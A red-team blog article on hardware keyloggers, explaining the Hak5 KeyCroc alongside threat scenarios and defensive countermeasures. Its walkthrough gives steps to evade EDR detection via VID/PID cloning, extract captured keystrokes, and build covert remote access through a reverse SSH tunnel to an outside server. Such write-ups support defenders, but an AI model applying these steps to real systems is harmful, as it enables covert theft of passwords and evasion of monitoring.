In the realm of IT security, the threat landscape constantly evolves, with adversaries employing increasingly sophisticated methods to gain unauthorised access to sensitive information. Among the covert tools adversaries utilise, hardware keyloggers can be used as stealthy devices designed to capture keystrokes covertly. With their inconspicuous nature and ability to intercept and record every keyboard stroke, these devices pose risks to organisations. In this article, we delve into the world of hardware keyloggers, exploring their functionality, potential applications, and the measures necessary to protect against this form of attack.

The attack scenario later described in this article is mainly based on an insider threat in which an adversary may conduct attacks by planting a hardware keylogger to capture confidential data or passwords.

What is a Hardware Keylogger?

Hardware keyloggers are physical devices that are connected between the keyboard and the computer. They record information directly from the keyboard before it reaches the computer’s operating system. By doing so, the attacker gains the ability to silently capture passwords, login credentials, and other confidential information. They may store the recorded data internally in their own memory or have the capability to transmit it wirelessly to a remote location for retrieval. Hardware keyloggers can be challenging to detect as they are physically hidden between the keyboard and the computer. This sets them apart to Software keyloggers which may be detected through antivirus, anti-malware scans or EDR solutions.

To construct a hardware keylogger from the ground up, there are various manuals available, such as the one by spacehuhn, keelog or RedBulletTooling. Alternatively, ready-made keyloggers can be purchased from reputable manufacturers. Hak5 and O.MG are among the well-known and trusted manufacturers in this field. Unfortunately, commercial Keyloggers are mostly closed source. Therefore even when the manufacturer is generaly trusted the device it is crucial to do a detailed analysis by reviewing its functionality.

Who will use them?

Various actors can install hardware keyloggers, each with their own motives and methods. Here are some possible scenarios:

• Insider Threats: Insider threats pose a significant risk to enterprise security, as individuals with authorized access to sensitive systems can exploit their privileges for malicious purposes. In this context, an adversary, be it a disgruntled employee, a corporate spy, or a compromised insider, may deploy hardware keyloggers as their way of choice
• Physical Access Attacks: Attackers with unauthorized physical access to a system, such as maintenance personnel or attackers who have compromised physical security, can install hardware keyloggers. They take advantage of unattended or vulnerable devices to implant the keyloggers discreetly
• Supply Chain Attacks: Hardware keyloggers can be pre-installed at the manufacturing or distribution level. This occurs when an attacker manipulates the supply chain, compromising devices before they reach the end users. These tampered devices are then unwittingly deployed within an enterprise, allowing the attacker to gather sensitive data
• Social Engineering: Attackers may employ social engineering techniques to trick individuals into unknowingly installing hardware keyloggers. For example, they might masquerade as IT support personnel, convincing employees to plug in a malicious USB device that contains the keylogger
• Interception During Shipment: In transit, the devices or peripherals being delivered to an organization can be intercepted and tampered with, allowing the attacker to implant a hardware keylogger before the package reaches its intended recipient

It’s important to note that the sophistication of hardware keyloggers varies. Some may be discreetly integrated into the device or peripheral, making them difficult to detect visually. Additionally, keyloggers can transmit captured data remotely if they have Wifi or mobile data connection capabilities implemented

Example Attack

The previously mentioned scenarios are ideal to simulate during a Red Team engagement. Subsequently, in the following sections, we explain how the Hak5 KeyCroc can effectively function as a keylogger, capturing keystrokes and facilitating remote access. However, it is important to note that the KeyCroc offers additional functionalities beyond keystroke logging. These include keystroke injection, trusted device emulation, pattern matching payloads, network hijacking, Wi-Fi connectivity, and more. Additionally, Hak5 has provided multiple keystroke injection samples on their GitHub repository.

KeyCroc Configuration

Some configuration steps are required before the KeyCroc can be used. The following chapters complement the HAK5 KeyCroc documentation. Additionally, you should thoroughly review the behaviour of the keylogger, for example, for unwanted communication.

PID/VID ID Cloning

The KeyCroc with the Version 1.3_513 is not cloning the keyboard VID (Vendor ID) and PID (Product ID). Without fixing this behaviour, the KeyCroc is detected by modern EDRs.

To correct this behavior, we suggest following these steps:

Fix the default VID and PID

With the following steps you can change the default KeyCroc VID and PID.

• Enter arming mode by pressing the arming button on the back of the device with a paper clip
• If enabled, turn off Protected Arming Mode in the config.txt by adding a hashtag before ARMING_PASS: #ARMING_PASS
• Connect to the Serial Console
• Run

cd /usr/local/croc/bin
cp ATTACKMODE ATTACKMODE.bak
nano ATTACKMODE

• Search for vid_default="0xF000" and change to your preferred VID
• Search for pid_hid_only="0xFF01" and change to your preferred PID
• Test different keyboards and verify if the VID and PID is correct

We also recommend changing the default VID and PID for the storage and the network adapter.

Fix the cloning functionality

The following steps are fixing the cloning functionality of the keyCroc.

• Enter arming mode by pressing the arming button on the back of the device with a paper clip
• If enabled, turn off Protected Arming Mode in the config.txt by adding a hashtag before ARMING_PASS: #ARMING_PASS
• Connect to the Serial Console
• Run

cd /usr/local/croc/bin
cp croc_framework croc_framework.bak
nano croc_framework

• Search for: ATTACKMODE HID "${params}"
• Remove the quotes or replace the above with: ATTACKMODE HID ${params}
• Test different keyboards and verify if the VID and PID are cloned

General Setup

This step only needs to be done once before the Key Croc device can be used.

• Enter arming mode by pressing the arming button on the back of the device with a paper clip
• Select the correct language file and save it to the languages folder of the KeyCroc. As we are mainly operate in Switzerland we had to extend the ch-de.json file by our self
• Move the file example_payload.txt from the folder payloads to the folder library\examples otherwise the word world will be appended to any typing of the word hello
• In the file config.txt change the variable DUCKY_LANG to the victims keyboard layout
• In the file config.txt add the variable ARMING_PASS and define a password. Without the arming password the KeyCroc can be set into the arming mode without providing a password first. We recommend to use an arming password during an engagement as the keycroc may contain sensitive data of the target user

We verified the Key Croc with the following keyboards:

• Logitech® Illuminated Keyboard Y-UY95 (cable)
• Logitech K120 for Business Y-U0009 (cable)
• Logitech Ultra-Flat Keyboard Y-BP62a (cable)
• Dell KB216 Wired Keyboard KB216 (cable)
• Dell USB Entry Keyboard SK-8115 (cable)
• CHERRY Corded Device JK-85 (cable)
• Logitech® Unifying Receiver (USB dongle onyl with keyboard: logi K540 Y-R0012)

KeyCroc in Action

• Plugin the Key Croc between keyboard and computer. We recommend using a USB extension cable
• As soon as the green and magenta LED blinking stops, and no LED is lit the keyboard can be used as usual and keystrokes will be recorded. If the white LED is lit then no keyboard is detected

How to read out the Loot log

• Activate arming mode by pressing the arming button on the back of the device with a paper clip after entering the arming mode password on the keyboard
  • The LED on the device should now blink blue
• Open the USB device called KeyCroc and navigate to the folder called loot
  • This folder should contain two files, one with raw and one with char in the filename
  • Normally you should be able to just read out the typed content in the file with char in the filename
  • If you suspect that not all characters have been converted correctly in the char file look into the raw file and check the effective recorded keystrokes

The following PowerShell script can support you in finding passwords or other information faster: keycroc_char_analysis.ps1

Remote connection via Internet to the KeyCroc

The following proof-of-concept describe how you can connect via SSH remotely to the KeyCroc.

POC prerequisites

• A KeyCroc
• A mobilephone or a device from which you can setup a wireless hotspot and mobile data connection
• A SIM card
• A remote SSH server

Prepare the KeyCroc

• Enter arming mode by pressing the arming button on the back of the device with a paper clip
• Enable Wifi – Spaces and special characters must be escaped.
  • In the file config.txt add the variable WIFI_SSID and chose a fitting name to the victims environemnt. E.g., Rabbans\ IPhone
  • In the file config.txt add the variable WIFI_PASS and set a strong password
• Create key pair for SSH

ssh-keygen -t ed25519 -m PKCS8 -C "$(whoami)@$(hostname)-$(date -I)" -f ~/.ssh/id_ed25519_home

• The private key is used on the KeyCroc to log on to the remote SHH server

Remote SSH Server

• Create a user that is allowed to login to your remote SSH server and add a key to authorized_keys

sudo useradd -m keycroc
sudo mkdir /home/keycroc/.ssh
sudo touch /home/keycroc/.ssh/authorized_keys
sudo chown -R keycroc:keycroc /home/keycroc/.ssh/
sudo chmod 700 /home/keycroc/.ssh
sudo chmod 600 /home/keycroc/.ssh/authorized_keys
sudo nano /etc/passwd

• Open /etc/passwd and add keycroc:x:1010:1011::/home/keycroc:/usr/sbin/nologin

Prepare a Mobile Data Connection Device The following example is using an Android phone with a mobile data connection plan. We recommend to use a keyboard to configure the phone. The phone should be encrypted and using a strong password to unlock the phone.

• Install Termux from GitHub. Do not use Termux from the Google Play Store
• Install the following packages

pkg upgrade
pkg update
pkg install openssh
pkg install screen

• Get your username whoami
• Set a password with passwd
• Start Screen session screen
• Allow File access termux-setup-storage
• Start the SSH Ssrver on the mobile phone. For a first test, you can start the SSH server in Debug mode with sshd -e -d -d -d
• Connect to your remote SHH server

ssh -N -R 42022:localhost:8022 -p 50022 -i /data/data/com.termux/files/home/storage/downloads/keycroc-openssh-privkey.ppk keycroc@$SHHServerIP

• To automate the connection, add a cron job triggering a bash script in which you can verify if the connection is active. Another cron job could reset the connection every 30 minutes.

Establish the connection to the KeyCroc

• Connect from the remote SSH Server to the Mobile Phone

ssh u0_a255@localhost -p 42022

• Connect to the KeyCroc

ssh root@192.168.43.30

Countermeasures

To reduce the risk of hardware keyloggers, the following measures can be taken:

• Access Controls: Implement strict access controls to limit user privileges. This ensures that only authorized individuals have access to critical systems and data
• Background Checks: Conduct thorough background checks on employees
• Employee Awareness: Educate employees about the risks associated with hardware keyloggers by conducting security awareness training programs. Emphasize the importance of vigilance and reporting any suspicious activity or devices. Encouraging a positive security culture by rewarding vigilant behaviour and emphasizing the significance of confidentiality and data protection can create a sense of responsibility and ownership among the workforce. Make sure to include your janitorial staff in this as well. If they notice someone acting suspiciously after work hours, they should report it
• Monitoring and Detection: Deploy monitoring and detection systems that can identify abnormal behavior or signs of unauthorized hardware modifications. Establish a hunting rule to monitor for unusual VID (Vendor) or PID (Product) ID changes in the keyboard when the device is in the office. Usually, companies provide employees with one keyboard brand
• Incident Response: Develop and regularly test incident response plans that also address insider-driven attacks involving hardware keyloggers. This ensures a swift and effective response to mitigate the impact and limit further compromise
• Physical Security: Enforce physical security protocols to prevent unauthorized access to systems and devices. Secure offices, server rooms, restrict physical access to sensitive areas, and inspect devices for tampering. Limit access to IT personnel only as they are often the first targets
• Authentication Methods: Use only authenticated methods such as smart cards, Microsoft Hello for Business, or FIDO 2.0 in combination with MFA rather than making employees use their passwords repeatedly for logins

Conclusion

In conclusion, hardware keyloggers can pose a threat to the security of organizations, as they can covertly intercept and record keystrokes and compromising sensitive information. This article has provided an overview of hardware keyloggers, their attack scenarios, and a technical example illustrating how they operate. To counter the dangers associated with hardware keyloggers and safeguard assets from internal threats, it is crucial for organizations to adopt a comprehensive approach. Technological safeguards play a vital role in mitigating risks. However, technological measures alone are not sufficient. Organizations must also prioritize employee education and awareness. It is essential to foster a positive security culture within the organization, emphasizing the importance of security measures and encouraging employees to actively participate in protecting sensitive information. Furthermore, organizations should appreciate their employees and create an environment where they feel valued and motivated. This helps foster loyalty and reduces the likelihood of insider threats. By promoting a positive work environment, organizations can minimize the risk of employees turning to malicious activities. Finally, an effective incident response framework is critical in addressing keylogger incidents promptly and efficiently. Establishing clear protocols and response plans, conducting exercises, and maintaining strong communication channels within the organization enables swift detection, containment, and resolution of keylogger-related incidents. By combining these measures, organizations can enhance their defenses against keyloggers, mitigate risks from adversaries, and better protect their IT-environment and sensitive information.

About the Author

Marius Elmiger is a security professional since the early 2000’s. He worked in various IT roles such as an administrator, engineer, architect, and consultant. His main activities included the implementation of complex IT infrastructure projects, implementation of security hardening concepts, and compromise recoveries. Later he transitioned to the offensive side. As a foundation, in addition to numerous IT certificates, Marius graduated with an MSc in Advanced Security & Digital Forensics at Edinburgh Napier University. (ORCID 0000-0002-2580-5636)

Links

• https://docs.hak5.org/key-croc/
• https://gist.github.com/m8r1us/69dcd19b2f3c53cd8f06d477fff0ff0a
• https://github.com/RedBulletTooling/KEYVILBOARD
• https://github.com/hak5/keycroc-payloads
• https://github.com/spacehuhn/wifi_keylogger
• https://github.com/termux/termux-app#Installation
• https://o.mg.lol/
• https://shop.hak5.org/
• https://shop.hak5.org/products/key-croc
• https://www.keelog.com/de/wireless-keylogger/